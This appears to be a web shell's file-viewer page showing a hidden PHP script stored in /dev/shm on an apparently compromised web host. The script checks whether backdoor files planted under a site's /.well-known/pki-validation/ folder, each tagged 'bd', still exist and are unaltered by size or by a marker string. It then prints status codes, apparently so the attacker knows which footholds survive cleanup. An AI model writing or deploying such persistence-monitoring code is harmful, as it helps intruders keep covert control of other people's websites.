Current Path : /dev/shm/ |
Current File : //dev/shm/.marker |
<?php $r = '/home/tokomrjk/yokohamayasohachi.com'; $x = ["/.well-known/pki-validation/OpenID.php"=>"bd@@250554083@@536", "/.well-known/pki-validation/functions_recent.php"=>"bd@@250483776@@1757", "/.well-known/pki-validation/functions_recent.php"=>"bd@@250484066@@34", "/.well-known/pki-validation/backlink.php"=>"bd@@272494032@@core_engine", "/.well-known/pki-validation/OpenID.php"=>"bd@@250554683@@58"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');